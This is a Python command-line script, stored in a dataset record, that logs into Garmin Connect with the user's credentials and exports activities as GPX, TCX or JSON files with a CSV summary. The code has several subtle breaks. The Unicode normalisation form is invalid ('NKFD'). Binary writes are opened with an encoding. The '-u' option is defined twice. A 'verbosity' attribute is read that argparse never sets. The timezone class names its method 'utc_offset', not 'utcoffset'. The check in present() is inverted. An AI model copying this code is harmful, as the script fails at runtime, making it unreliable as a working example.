{"api_name": "crate.operator.webhooks.webhook_client", "line_number": 235, "usage_type": "name"}]} +{"seq_id": "34755944537", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCLI for Garmin Connect - all activities exporter\n\"\"\"\n\nfrom datetime import datetime, timedelta, tzinfo\nfrom getpass import getpass\nfrom math import floor\nfrom platform import python_version\nfrom subprocess import call\nfrom timeit import default_timer as timer\n\nimport argparse\nimport csv\nimport io\nimport json\nimport logging\nimport os\nimport os.path\nimport re\nimport string\nimport sys\nimport unicodedata\nimport zipfile\n\nimport http.cookiejar\nimport urllib.error\nimport urllib.parse\nimport urllib.request\nimport urllib\nfrom urllib.error import HTTPError, URLError\nfrom urllib.parse import urlencode\nfrom urllib.request import Request\n\n\nfrom filtering import update_download_stats, read_exclude\n\n\nCOOKIE_JAR = http.cookiejar.CookieJar()\nOPENER = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(COOKIE_JAR), urllib.request.HTTPSHandler(debuglevel=0))\n\nSCRIPT_VERSION = '1.0.0'\n\n# it's almost the datetime format that is used by Garmin in the activity-search-service\nALMOST_RFC_1123 = \"%a, %d %b %Y %H:%M\" # JSON display fields - Garmin didn't zero-pad the date and the hour, but %d and %H do\n\nVALID_FILENAME_CHARS = f\"-_.() {string.ascii_letters}{string.digits}\"\n\n# mapping of numeric parentTypeId to names in CSV output\nPARENT_TYPE_ID = {\n 1: 'running',\n 2: 'cycling',\n 3: 'hiking',\n 4: 'other',\n 9: 'walking',\n 17: 'any',\n 26: 'swimming',\n 29: 'fitness_equipment',\n 71: 'motorcycling',\n 83: 'transition',\n 144: 'diving',\n 149: 'yoga',\n 165: 'winter_sports'\n}\n\n# which typeId value should use pace instead of speed\nUSES_PACE = {1, 3, 9, 26} # running, hiking, walking, swimming\n\nHR_ZONES_EMPTY = [None]*5\n\n# max number of a ctivities that can be requested at once - but the limit is not known. 1000 should work\nLIMIT_MAXIMUM = 1000\n\nMAX_TRIES = 3\n\nCSV_TEMPLATE = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'csv_header_default.properties')\n\nWEBHOST = 'https://connect.garmin.com'\nREDIRECT = 'https://connect.garmin.com/modern/'\nBASE_URL = 'https://connect.garmin.com/en-US/signin'\nSSO = 'https://sso.garmin.com/sso'\nCSS = 'https://static.garmincdn.com/com.garmin.connect/ui/css/gauth-custom-v1.2-min.css'\n\nDATA = {\n 'service': REDIRECT,\n 'webhost': WEBHOST,\n 'source': BASE_URL,\n 'redirectAfterAccountLoginUrl': REDIRECT,\n 'redirectAfterAccountCreationUrl': REDIRECT,\n 'gauthHost': SSO,\n 'locale': 'en_US',\n 'id': 'gauth-widget',\n 'cssUrl': CSS,\n 'clientId': 'GarminConnect',\n 'rememberMeShown': 'true',\n 'rememberMeChecked': 'false',\n 'createAccountShown': 'true',\n 'openCreateAccount': 'false',\n 'displayNameShown': 'false',\n 'consumeServiceTicket': 'false',\n 'initialFocus': 'true',\n 'embedWidget': 'false',\n 'generateExtraServiceTicket': 'true',\n 'generateTwoExtraServiceTickets': 'false',\n 'generateNoServiceticket': 'false',\n 'globalOptInShown': 'true',\n 'globalOptInChecked': 'false',\n 'mobile': 'false',\n 'connectLegalTerms': 'true',\n 'locationPromptShown': 'true',\n 'showPassword': 'true'\n}\n\n# URLs for various services\n\nURL_GC_LOGIN = 'https://sso.garmin.com/sso/signin?' + urlencode(DATA)\nURL_GC_POST_AUTH = 'https://connect.garmin.com/modern/activities?'\nURL_GC_PROFILE = 'https://connect.garmin.com/modern/profile'\nURL_GC_USERSTATS = 'https://connect.garmin.com/modern/proxy/userstats-service/statistics/'\nURL_GC_LIST = 'https://connect.garmin.com/modern/proxy/activitylist-service/activities/search/activities?'\nURL_GC_ACTIVITY = 'https://connect.garmin.com/modern/proxy/activity-service/activity/'\nURL_GC_DEVICE = 'https://connect.garmin.com/modern/proxy/device-service/deviceservice/app-info/'\nURL_GC_GEAR = 'https://connect.garmin.com/modern/proxy/gear-service/gear/filterGear?activityId='\nURL_GC_ACT_PROPS = 'https://connect.garmin.com/modern/main/js/properties/activity_types/activity_types.properties'\nURL_GC_EVT_PROPS = 'https://connect.garmin.com/modern/main/js/properties/event_types/event_types.properties'\nURL_GC_GPX_ACTIVITY = 'https://connect.garmin.com/modern/proxy/download-service/export/gpx/activity/'\nURL_GC_TCX_ACTIVITY = 'https://connect.garmin.com/modern/proxy/download-service/export/tcx/activity/'\nURL_GC_ORIGINAL_ACTIVITY = 'http://connect.garmin.com/proxy/download-service/files/activity/'\n\n\ndef resolve_path(directory, subdir, time):\n \"\"\"\n Replace time variables and returns changed path. Supported placeholders are {YYYY} and {MM}.\n :param directory: export root directory\n :param subdir: subdirectory that can have placeholders\n :param time: date-time-string\n :return: updated dictionary string\n \"\"\"\n ret = os.path.join(directory, subdir)\n if re.compile(\".*{YYYY}.*\").match(ret):\n ret = ret.replace(\"{YYYY}\", time[0:4])\n if re.compile(\".*{MM}.*\").match(ret):\n ret = ret.replace(\"{MM}\", time[5:7])\n\n return ret\n\n\ndef hhmmss_from_seconds(sec):\n \"\"\"\n Converting seconds to HH:MM:SS time format.\n \"\"\"\n if isinstance(sec, (float, int)):\n formatted_time = str(timedelta(seconds=int(sec))).zfill(8)\n else:\n formatted_time = '0.000'\n return formatted_time\n\n\ndef kmh_from_mps(mps):\n \"\"\"\n Converting meters per second (mps) to km/h.\n \"\"\"\n return str(mps * 3.6)\n\n\ndef sanitize_filename(name, max_length=0):\n \"\"\"\n Removing or replacing characters that are unsafe for filename.\n \"\"\"\n cleaned_filename = unicodedata.normalize('NKFD', name) if name else ''\n stripped_filename = ''.join(c for c in cleaned_filename if c in VALID_FILENAME_CHARS).replace(' ', '_')\n return stripped_filename[:max_length] if max_length > 0 else stripped_filename\n\n\ndef write_to_file(filename, content, mode='w', file_time=None):\n \"\"\"\n Helper function that perssts content to a file.\n :param filename: name of the file to write\n :param content: content to write; can be 'bytes' or 'str'\n If it is 'bytes' and the mode 'w', it will be converted/decoded.\n :param mode: 'w' or 'wb'\n :param file_time: if given use as timestamp for the file written (in seconds since 1970-01-01)\n \"\"\"\n if mode == 'w':\n write_file = io.open(filename, mode, encoding='utf-8')\n if isinstance(content, bytes):\n content = content.decode('utf-8')\n elif mode == 'wb':\n write_file = io.open(filename, mode, encoding=\"utf-8\")\n else:\n raise Exception('Unsupported file mode: ', mode)\n write_file.write(content)\n write_file.close()\n if file_time:\n os.utime(filename, (file_time, file_time))\n\n\ndef http_req(url, post=None, headers=None):\n \"\"\"\n Making HTTP requests.\n :param url: URL for the request\n :param post: dictionary of POST\n :param headers: dictionary of headers\n :return: response body (type 'bytes')\n \"\"\"\n request = Request(url)\n\n # supported browsers\n request.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2816.0 Safari/537.36')\n request.add_header('nk', 'NT') # necessary to avoid HTTP error code 402\n if headers:\n for header_key, header_value in headers.items():\n request.add_header(header_key, header_value)\n if post:\n post = urlencode(post) # convert dictionary to POST parameter string.\n post = post.encode('utf-8')\n start_time = timer()\n\n try:\n response = OPENER.open(request, data=post)\n except HTTPError as ex:\n if hasattr(ex, 'code'):\n logging.error(\"Server couldn't fulfill the request, code %s, error: %s\", ex.code, ex)\n logging.info('Headers returned:\\n%s', ex.info())\n raise\n except URLError as ex:\n if hasattr(ex, 'reason'):\n logging.error('Failed to reach url %s, error: %s', url, ex)\n raise\n logging.debug('Got %s in %s s from %s', response.getcode(), timer() - start_time, url)\n logging.debug('Headers returned: \\n%s', response.info())\n\n if response.getcode() == 204:\n # 204 = no content, e.g. for activities without GPS coordinates there is no GPX download.\n # Write an empty file to prevent redownloading it.\n logging.info('Got 204 for %s, returning empty response', url)\n return b''\n if response.getcode() != 200:\n raise Exception(f'Bad return code ({response.getcode()}) for: {url}')\n\n return response.read()\n\n\ndef http_req_as_string(url, post=None, headers=None):\n \"\"\"\n Making HTTP requests, returning a string instead of bytes.\n \"\"\"\n return http_req(url, post, headers).decode()\n\n\ndef load_properties(multiline, separator='=', comment_char='#', keys=None):\n \"\"\"\n Reading multiline string of properties (key-value pair separated by *separator*) into a dict.\n\n :param multiline: input string of properties\n :param separator: separator between key and value\n :param comment_char: lines starting with this char are considered as comments, not key-value pairs\n :param keys: list to append the keys to\n :return:\n \"\"\"\n properties = {}\n for line in multiline.splitlines():\n stripped_line = line.strip()\n if stripped_line and not stripped_line.startswith(comment_char):\n key_value = stripped_line.split(separator)\n key = key_value[0].strip()\n value = separator.join(key_value[1:]).strip().strip('\"')\n properties[key] = value\n if keys is not None:\n keys.append(key)\n return properties\n\n\ndef value_if_found_else_key(some_dict, key):\n \"\"\"\n Lookup a value in some_dict and use the key itself as a fallback.\n \"\"\"\n return some_dict.get(key, key)\n\n\ndef present(element, act):\n \"\"\"\n Returning True if act[element] is valid and not None.\n \"\"\"\n if not act and element not in act:\n return False\n return act[element]\n\n\ndef absent_or_null(element, act):\n \"\"\"\n Return False only if act[element] is valid and not None.\n \"\"\"\n if not act and element not in act:\n return True\n if act[element]:\n return False\n return True\n\n\ndef from_activities_or_details(element, act, detail, detail_container):\n \"\"\"\n Return detail[detail_container][element] if valid and act[element] (or None) otherwise.\n \"\"\"\n if absent_or_null(detail_container, detail) or absent_or_null(element, detail[detail_container]):\n return None if absent_or_null(element, act) else act[element]\n return detail[detail_container][element]\n\n\ndef trunc6(some_float):\n \"\"\"\n Return the given float as a string formatted with six digit precision.\n \"\"\"\n return \"{0:12.6f}\".format(floor(some_float * 1000000) / 1000000).lstrip()\n\n\nclass FixedOffset(tzinfo):\n \"\"\"\n Fixed offset in minutes east from UTC.\n \"\"\"\n\n def __init__(self, offset, name):\n super().__init__()\n self.__offset = timedelta(minutes=offset)\n self.__name = name\n\n\n def utc_offset(self, dt):\n return self.__offset\n\n def tzname(self, dt):\n return self.__name\n\n def dst(self, dt):\n return timedelta(0)\n\n\ndef offset_date_time(time_local, time_gmt):\n \"\"\"\n Building an 'aware' datetime from two naive datetime objects (that is timestamps as present in the activitylist-service.json), using the time difference as offset.\n \"\"\"\n local_dt = datetime_from_iso(time_local)\n gmt_dt = datetime_from_iso(time_gmt)\n offset = local_dt - gmt_dt\n offset_tz = FixedOffset(offset.seconds // 60, \"LCL\")\n return local_dt.replace(tzinfo=offset_tz)\n\ndef datetime_from_iso(iso_date_time):\n \"\"\"\n Calling 'datetime.strptime' supporting different ISO time formats\n (with or without 'T' between date and time, with or without microseconds, but without offset).\n :param iso_date_time: timestamp string in ISO format\n :return: a 'naive' datetime\n \"\"\"\n pattern = re.compile(r\"(\\d{4}-\\d{2}-\\d{2})[T ](\\d{2}:\\d{2}:\\d{2})(\\.\\d+)?\")\n match = pattern.match(iso_date_time)\n if not match:\n raise Exception(f'Invalid ISO timestamp {iso_date_time}.')\n micros = match.group(3) if match.group(3) else \".0\"\n iso_with_micros = f'{match.group(1)} {match.group(2)}{micros}'\n return datetime.strptime(iso_with_micros, \"%Y-%m-%d %H:%M:%S.%f\")\n\n\ndef epoch_seconds_from_summary(summary):\n \"\"\"\n Function determining the start time in epoch seconds (seconds since 1970-01-01).\n :param summary: summary dict\n :return: epoch seconds as integer\n \"\"\"\n if present('beginTimestamp', summary):\n return summary['beginTimestamp'] // 1000\n if present('startTimeLocal', summary) and present('startTimeGMT', summary):\n dt = offset_date_time(summary['startTimeLocal'], summary['startTimeGMT'])\n return int(dt.timestamp())\n logging.info('No timestamp found in activity %s', summary['activityId'])\n return None\n\n\ndef pace_or_speed_raw(type_id, parent_type_id, mps):\n \"\"\"\n Convert speed (m/s) to speed (km/h) or pace (min/km) depending on type and parent type. \n \"\"\"\n kmh = 3.6 * mps\n if (type_id in USES_PACE) or (parent_type_id in USES_PACE):\n return 60/kmh\n return kmh\n\n\ndef pace_or_speed_formatted(type_id, parent_type_id, mps):\n \"\"\"\n Convert speed (m/s) to string: speed (km/h as x.x) or pace (min/km as MM:SS),\n depending on type and parent type.\n \"\"\"\n kmh = 3.6 * mps\n if (type_id in USES_PACE) or (parent_type_id in USES_PACE):\n return '{0:02d}:{1:02d}'.format(*divmod(int(round(3600/kmh)), 60))\n return \"{0:.1f}\".format(round(kmh, 1))\n\n\nclass CsvFilter:\n \"\"\"\n Collects, filters and writes CSV files.\n \"\"\"\n\n def __init__(self, csv_file, csv_header_properties):\n self.__csv_file = csv_file\n with open(csv_header_properties, 'r', encoding=\"utf-8\") as properties:\n csv_header_properties = properties.read()\n self.__csv_columns = []\n self.__csv_headers = load_properties(csv_header_properties, keys=self.__csv_columns)\n self.__csv_field_names = []\n for column in self.__csv_columns:\n self.__csv_field_names.append(self.__csv_headers[column])\n self.__writer = csv.DictWriter(self.__csv_file, fieldnames=self.__csv_field_names, quoting=csv.QUOTE_ALL)\n self.__current_row = {}\n\n def write_header(self):\n \"\"\"\n Writing the active column names as CSV headers.\n \"\"\"\n self.__writer.writeheader()\n\n def write_row(self):\n \"\"\"\n Writing the prepared CSV record.\n \"\"\"\n self.__writer.writerow(self.__current_row)\n self.__current_row = {}\n\n def set_column(self, name, value):\n \"\"\"\n Storing a column value (if the column is active) into the record prepared for the next write_row call\n \"\"\"\n if value and name in self.__csv_columns:\n self.__current_row[self.__csv_headers[name]] = value\n\n def is_column_active(self, name):\n \"\"\"\n Return True if the column is present in the header template.\n \"\"\"\n return name in self.__csv_columns\n\ndef parse_arguments(argv):\n \"\"\"\n Setup the argument parser and parse the command line arguments.\n \"\"\"\n current_date = datetime.now().strftime('%Y-%m-%d')\n activities_directory = f'./{current_date}_garmin_connect_export'\n\n parser = argparse.ArgumentParser(description='Garmin Connect Exporter')\n\n parser.add_argument('-v','--version', action='version', version='%(prog)s ' + SCRIPT_VERSION,\n help='print version and exit')\n parser.add_argument('-vv', '--verbose', action='count', default=0,\n help='show output and log verbosity, save more intermediate files')\n parser.add_argument('-u', '--username',\n help='Garmin Connect username or email address')\n parser.add_argument('-p', '--password',\n help='Garmin Connect password')\n parser.add_argument('-c', '--count', default='1',\n help='number of recent activities to download, or \\'all\\' (default: 1)')\n parser.add_argument('-e', '--external',\n help='path to external program to pass CSV file too')\n parser.add_argument('-a', '--args',\n help='additional arguments to pass to external program')\n parser.add_argument('-f', '--format', choices=['gpx', 'tcx', 'original', 'json'], default='gpx',\n help=\"export format; can be 'gpx', 'tcx', 'original' or 'json' (default: 'gpx')\")\n parser.add_argument('-d', '--directory', default=activities_directory,\n help='the directory to export to (default: \\'./YYYY-MM-DD_garmin_connect_export\\')')\n parser.add_argument('-s', '--subdir',\n help='the subdirectory for activity files (tcx, gpx etc.), supported placeholders are {YYYY} and {MM} (default: export directory)')\n parser.add_argument('-lp', '--logpath',\n help='the directory to store logfiles (default: same as for --directory)')\n parser.add_argument('-u', '--unzip', action='store_true',\n help='if downloading ZIP files (format: \\'original\\'), unzip the file and remove the ZIP file')\n parser.add_argument('-ot', '--originaltime', action='store_true',\n help='will set downloaded (and possibly unzipped) file time to the activity start time')\n parser.add_argument('--desc', type=int, nargs='?', const=0, default=None,\n help='append the activity\\'s description to the file name of the download; limit size if number is given')\n parser.add_argument('-t', '--template', default=CSV_TEMPLATE,\n help='template file with desired columns for CSV output')\n parser.add_argument('-fp', '--fileprefix', action='count', default=0,\n help='set the local time as activity file name prefix')\n parser.add_argument('-sa', '--start_activity_no', type=int, default=1,\n help='give index for first activity to import, i.e. skipping the newest activities')\n parser.add_argument('-ex', '--exclude', metavar='FILE',\n help='JSON file with Array of activity IDs to exclude from download. Format example: {\"ids\": [\"6176888711\"]}')\n\n return parser.parse_args(argv[1:])\n\ndef login_to_garmin_connect(args):\n \"\"\"\n Perform all HTTP requests to login to Garmin Connect.\n \"\"\"\n username = args.username if args.username else input('Username: ')\n password = args.password if args.password else getpass()\n\n logging.debug('Login params: %s', urlencode(DATA))\n\n # Initially, to get a valid session cookie it is necessary to pull the login page.\n print('Connecting to Garmin Connect...', end='')\n logging.info('Connecting to %s', URL_GC_LOGIN)\n connect_response = http_req_as_string(URL_GC_LOGIN)\n if args.verbosity > 0:\n write_to_file(os.path.join(args.directory, 'connect_response.html'), connect_response, 'w')\n for cookie in COOKIE_JAR:\n logging.debug('Cookie %s: %s', cookie.name, cookie.value)\n print('Done')\n\n # Actual login - fields that are passed in a typical Garmin login.\n post_data = {\n 'username': username,\n 'password': password,\n 'embed': 'false',\n 'rememberme': 'on'\n }\n\n headers = {\n 'referer': URL_GC_LOGIN\n }\n\n print('Requesting Login ticket...', end='')\n logging.info('Requesting Login ticket')\n login_response = http_req_as_string(f'{URL_GC_LOGIN}#', post_data, headers)\n\n for cookie in COOKIE_JAR:\n logging.debug('Cookie %s: %s', cookie.name, cookie.value)\n if args.verbosity > 0:\n write_to_file(os.path.join(args.directory, 'login_response.html'), login_response, 'w')\n\n # extract the ticket from the login response\n pattern = re.compile(r\".*\\?ticket=([-\\w]+)\\\";.*\", re.MULTILINE | re.DOTALL)\n match = pattern.match(login_response)\n if not match:\n raise Exception('Could not find ticket in the login response. Cannot log in.')\n login_ticket = match.group(1)\n print('Done. Ticket=', login_ticket, sep='')\n\n print('Authenticating...', end='')\n logging.info('Authentication URL %s', f'{URL_GC_POST_AUTH}ticket={login_ticket}')\n http_req(f'{URL_GC_POST_AUTH}ticket={login_ticket}')\n print('Done')\n\ndef csv_write_record(csv_filter, extract, activity, details, activity_type_name, event_type_name):\n \"\"\"\n Write out the given data as a CSV record.\n \"\"\"\n type_id = 4 if absent_or_null('activityType', activity) else activity['activityType']['typeId']\n parent_type_id = 4 if absent_or_null('activityType', activity) else activity['activityType']['parentTypeId']\n if present(parent_type_id, PARENT_TYPE_ID):\n parent_type_key = PARENT_TYPE_ID[parent_type_id]\n else:\n parent_type_key = None\n logging.warning('Unknown parentType %s', str(parent_type_id))\n\n # get some values from details if present\n start_latitude = from_activities_or_details('startLatitude', activity, details, 'summaryDTO')\n start_longitude = from_activities_or_details('startLongitude', activity, details, 'summaryDTO')\n end_latitude = from_activities_or_details('endLatitude', activity, details, 'summaryDTO')\n end_longitude = from_activities_or_details('endLongitude', activity, details, 'summaryDTO')\n\n csv_filter.set_column('id', str(activity['activityId']))\n csv_filter.set_column('url', 'https://connect.garmin.com/modern/activity/' + str(activity['activityId']))\n csv_filter.set_column('activityName', activity['activityName'] if present('activityName', activity) else None)\n csv_filter.set_column('description', activity['description'] if present('description', activity) else None)\n csv_filter.set_column('startTimeIso', extract['start_time_with_offset'].isoformat())\n csv_filter.set_column('startTime1123', extract['start_time_with_offset'].strftime(ALMOST_RFC_1123))\n csv_filter.set_column('startTimeMillis', str(activity['beginTimestamp']) if present('beginTimestamp', activity) else None)\n csv_filter.set_column('startTimeRaw', details['summaryDTO']['startTimeLocal'] if present('startTimeLocal', details['summaryDTO']) else None)\n csv_filter.set_column('endTimeIso', extract['end_time_with_offset'].isoformat() if extract['end_time_with_offset'] else None)\n csv_filter.set_column('endTime1123', extract['end_time_with_offset'].strftime(ALMOST_RFC_1123) if extract['end_time_with_offset'] else None)\n csv_filter.set_column('endTimeMillis', str(activity['beginTimestamp'] + extract['elapsed_seconds'] * 1000) if present('beginTimestamp', activity) else None)\n csv_filter.set_column('durationRaw', str(round(activity['duration'], 3)) if present('duration', activity) else None)\n csv_filter.set_column('duration', hhmmss_from_seconds(round(activity['duration'])) if present('duration', activity) else None)\n csv_filter.set_column('elapsedDurationRaw', str(round(extract['elapsed_duration'], 3)) if extract['elapsed_duration'] else None)\n csv_filter.set_column('elapsedDuration', hhmmss_from_seconds(round(extract['elapsed_duration'])) if extract['elapsed_duration'] else None)\n csv_filter.set_column('movingDurationRaw', str(round(details['summaryDTO']['movingDuration'], 3)) if present('movingDuration', details['summaryDTO']) else None)\n csv_filter.set_column('movingDuration', hhmmss_from_seconds(round(details['summaryDTO']['movingDuration'])) if present('movingDuration', details['summaryDTO']) else None)\n csv_filter.set_column('distanceRaw', \"{0:.5f}\".format(activity['distance'] / 1000) if present('distance', activity) else None)\n csv_filter.set_column('averageSpeedRaw', kmh_from_mps(details['summaryDTO']['averageSpeed']) if present('averageSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('averageSpeedPaceRaw', trunc6(pace_or_speed_raw(type_id, parent_type_id, activity['averageSpeed'])) if present('averageSpeed', activity) else None)\n csv_filter.set_column('averageSpeedPace', pace_or_speed_formatted(type_id, parent_type_id, activity['averageSpeed']) if present('averageSpeed', activity) else None)\n csv_filter.set_column('averageMovingSpeedRaw', kmh_from_mps(details['summaryDTO']['averageMovingSpeed']) if present('averageMovingSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('averageMovingSpeedPaceRaw', trunc6(pace_or_speed_raw(type_id, parent_type_id, details['summaryDTO']['averageMovingSpeed'])) if present('averageMovingSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('averageMovingSpeedPace', pace_or_speed_formatted(type_id, parent_type_id, details['summaryDTO']['averageMovingSpeed']) if present('averageMovingSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('maxSpeedRaw', kmh_from_mps(details['summaryDTO']['maxSpeed']) if present('maxSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('maxSpeedPaceRaw', trunc6(pace_or_speed_raw(type_id, parent_type_id, details['summaryDTO']['maxSpeed'])) if present('maxSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('maxSpeedPace', pace_or_speed_formatted(type_id, parent_type_id, details['summaryDTO']['maxSpeed']) if present('maxSpeed', details['summaryDTO']) else None)\n csv_filter.set_column('elevationLoss', str(round(details['summaryDTO']['elevationLoss'], 2)) if present('elevationLoss', details['summaryDTO']) else None)\n csv_filter.set_column('elevationLossUncorr', str(round(details['summaryDTO']['elevationLoss'], 2)) if not activity['elevationCorrected'] and present('elevationLoss', details['summaryDTO']) else None)\n csv_filter.set_column('elevationLossCorr', str(round(details['summaryDTO']['elevationLoss'], 2)) if activity['elevationCorrected'] and present('elevationLoss', details['summaryDTO']) else None)\n csv_filter.set_column('elevationGain', str(round(details['summaryDTO']['elevationGain'], 2)) if present('elevationGain', details['summaryDTO']) else None)\n csv_filter.set_column('elevationGainUncorr', str(round(details['summaryDTO']['elevationGain'], 2)) if not activity['elevationCorrected'] and present('elevationGain', details['summaryDTO']) else None)\n csv_filter.set_column('elevationGainCorr', str(round(details['summaryDTO']['elevationGain'], 2)) if activity['elevationCorrected'] and present('elevationGain', details['summaryDTO']) else None)\n csv_filter.set_column('minElevation', str(round(details['summaryDTO']['minElevation'], 2)) if present('minElevation', details['summaryDTO']) else None)\n csv_filter.set_column('minElevationUncorr', str(round(details['summaryDTO']['minElevation'], 2)) if not activity['elevationCorrected'] and present('minElevation', details['summaryDTO']) else None)\n csv_filter.set_column('minElevationCorr', str(round(details['summaryDTO']['minElevation'], 2)) if activity['elevationCorrected'] and present('minElevation', details['summaryDTO']) else None)\n csv_filter.set_column('maxElevation', str(round(details['summaryDTO']['maxElevation'], 2)) if present('maxElevation', details['summaryDTO']) else None)\n csv_filter.set_column('maxElevationUncorr', str(round(details['summaryDTO']['maxElevation'], 2)) if not activity['elevationCorrected'] and present('maxElevation', details['summaryDTO']) else None)\n csv_filter.set_column('maxElevationCorr', str(round(details['summaryDTO']['maxElevation'], 2)) if activity['elevationCorrected'] and present('maxElevation', details['summaryDTO']) else None)\n csv_filter.set_column('elevationCorrected', 'true' if activity['elevationCorrected'] else 'false')\n # csv_record += empty_record # no minimum heart rate in JSON\n csv_filter.set_column('maxHRRaw', str(details['summaryDTO']['maxHR']) if present('maxHR', details['summaryDTO']) else None)\n csv_filter.set_column('maxHR', \"{0:.0f}\".format(activity['maxHR']) if present('maxHR', activity) else None)\n csv_filter.set_column('averageHRRaw', str(details['summaryDTO']['averageHR']) if present('averageHR', details['summaryDTO']) else None)\n csv_filter.set_column('averageHR', \"{0:.0f}\".format(activity['averageHR']) if present('averageHR', activity) else None)\n csv_filter.set_column('caloriesRaw', str(details['summaryDTO']['calories']) if present('calories', details['summaryDTO']) else None)\n csv_filter.set_column('calories', \"{0:.0f}\".format(details['summaryDTO']['calories']) if present('calories', details['summaryDTO']) else None)\n csv_filter.set_column('vo2max', str(activity['vO2MaxValue']) if present('vO2MaxValue', activity) else None)\n csv_filter.set_column('aerobicEffect', str(round(details['summaryDTO']['trainingEffect'], 2)) if present('trainingEffect', details['summaryDTO']) else None)\n csv_filter.set_column('anaerobicEffect', str(round(details['summaryDTO']['anaerobicTrainingEffect'], 2)) if present('anaerobicTrainingEffect', details['summaryDTO']) else None)\n csv_filter.set_column('hrZone1Low', str(extract['hrZones'][0]['zoneLowBoundary']) if present('zoneLowBoundary', extract['hrZones'][0]) else None)\n csv_filter.set_column('hrZone1Seconds', \"{0:.0f}\".format(extract['hrZones'][0]['secsInZone']) if present('secsInZone', extract['hrZones'][0]) else None)\n csv_filter.set_column('hrZone2Low', str(extract['hrZones'][1]['zoneLowBoundary']) if present('zoneLowBoundary', extract['hrZones'][1]) else None)\n csv_filter.set_column('hrZone2Seconds', \"{0:.0f}\".format(extract['hrZones'][1]['secsInZone']) if present('secsInZone', extract['hrZones'][1]) else None)\n csv_filter.set_column('hrZone3Low', str(extract['hrZones'][2]['zoneLowBoundary']) if present('zoneLowBoundary', extract['hrZones'][2]) else None)\n csv_filter.set_column('hrZone3Seconds', \"{0:.0f}\".format(extract['hrZones'][2]['secsInZone']) if present('secsInZone', extract['hrZones'][2]) else None)\n csv_filter.set_column('hrZone4Low', str(extract['hrZones'][3]['zoneLowBoundary']) if present('zoneLowBoundary', extract['hrZones'][3]) else None)\n csv_filter.set_column('hrZone4Seconds', \"{0:.0f}\".format(extract['hrZones'][3]['secsInZone']) if present('secsInZone', extract['hrZones'][3]) else None)\n csv_filter.set_column('hrZone5Low', str(extract['hrZones'][4]['zoneLowBoundary']) if present('zoneLowBoundary', extract['hrZones'][4]) else None)\n csv_filter.set_column('hrZone5Seconds', \"{0:.0f}\".format(extract['hrZones'][4]['secsInZone']) if present('secsInZone', extract['hrZones'][4]) else None)\n csv_filter.set_column('averageRunCadence', str(round(details['summaryDTO']['averageRunCadence'], 2)) if present('averageRunCadence', details['summaryDTO']) else None)\n csv_filter.set_column('maxRunCadence', str(details['summaryDTO']['maxRunCadence']) if present('maxRunCadence', details['summaryDTO']) else None)\n csv_filter.set_column('strideLength', str(round(details['summaryDTO']['strideLength'], 2)) if present('strideLength', details['summaryDTO']) else None)\n csv_filter.set_column('steps', str(activity['steps']) if present('steps', activity) else None)\n csv_filter.set_column('averageCadence', str(activity['averageBikingCadenceInRevPerMinute']) if present('averageBikingCadenceInRevPerMinute', activity) else None)\n csv_filter.set_column('maxCadence', str(activity['maxBikingCadenceInRevPerMinute']) if present('maxBikingCadenceInRevPerMinute', activity) else None)\n csv_filter.set_column('strokes', str(activity['strokes']) if present('strokes', activity) else None)\n csv_filter.set_column('averageTemperature', str(details['summaryDTO']['averageTemperature']) if present('averageTemperature', details['summaryDTO']) else None)\n csv_filter.set_column('minTemperature', str(details['summaryDTO']['minTemperature']) if present('minTemperature', details['summaryDTO']) else None)\n csv_filter.set_column('maxTemperature', str(details['summaryDTO']['maxTemperature']) if present('maxTemperature', details['summaryDTO']) else None)\n csv_filter.set_column('device', extract['device'] if extract['device'] else None)\n csv_filter.set_column('gear', extract['gear'] if extract['gear'] else None)\n csv_filter.set_column('activityTypeKey', activity['activityType']['typeKey'].title() if present('typeKey', activity['activityType']) else None)\n csv_filter.set_column('activityType', value_if_found_else_key(activity_type_name, 'activity_type_' + activity['activityType']['typeKey']) if present('activityType', activity) else None)\n csv_filter.set_column('activityParent', value_if_found_else_key(activity_type_name, 'activity_type_' + parent_type_key) if parent_type_key else None)\n csv_filter.set_column('eventTypeKey', activity['eventType']['typeKey'].title() if present('typeKey', activity['eventType']) else None)\n csv_filter.set_column('eventType', value_if_found_else_key(event_type_name, activity['eventType']['typeKey']) if present('eventType', activity) else None)\n csv_filter.set_column('privacy', details['accessControlRuleDTO']['typeKey'] if present('typeKey', details['accessControlRuleDTO']) else None)\n csv_filter.set_column('fileFormat', details['metadataDTO']['fileFormat']['formatKey'] if present('fileFormat', details['metadataDTO']) and present('formatKey', details['metadataDTO']['fileFormat']) else None)\n csv_filter.set_column('tz', details['timeZoneUnitDTO']['timeZone'] if present('timeZone', details['timeZoneUnitDTO']) else None)\n csv_filter.set_column('tzOffset', extract['start_time_with_offset'].isoformat()[-6:])\n csv_filter.set_column('locationName', details['locationName'] if present('locationName', details) else None)\n csv_filter.set_column('startLatitudeRaw', str(start_latitude) if start_latitude else None)\n csv_filter.set_column('startLatitude', trunc6(start_latitude) if start_latitude else None)\n csv_filter.set_column('startLongitudeRaw', str(start_longitude) if start_longitude else None)\n csv_filter.set_column('startLongitude', trunc6(start_longitude) if start_longitude else None)\n csv_filter.set_column('endLatitudeRaw', str(end_latitude) if end_latitude else None)\n csv_filter.set_column('endLatitude', trunc6(end_latitude) if end_latitude else None)\n csv_filter.set_column('endLongitudeRaw', str(end_longitude) if end_longitude else None)\n csv_filter.set_column('endLongitude', trunc6(end_longitude) if end_longitude else None)\n csv_filter.set_column('sampleCount', str(extract['samples']['metricsCount']) if present('metricsCount', extract['samples']) else None)\n\n csv_filter.write_row()\n\n\ndef extract_device(device_dict, details, start_time_seconds, args, http_caller, file_writer):\n \"\"\"\n Function trying to get the device details (and cache them as they're used for multiple activities)\n\n :param device_dict: cache (dict) of already known devices\n :param details: dict with the details of an activity, should contain a device ID\n :param start_time_seconds: if given use as timestamp for the file written (in seconds since 1970-01-01)\n :param args: command-line arguments (for the file_writer callback)\n :param http_caller: callback to perform the HTTP call for downloading the device details\n :param file_writer: callback that saves the device details in a file\n :return: string with the device name\n \"\"\"\n if not 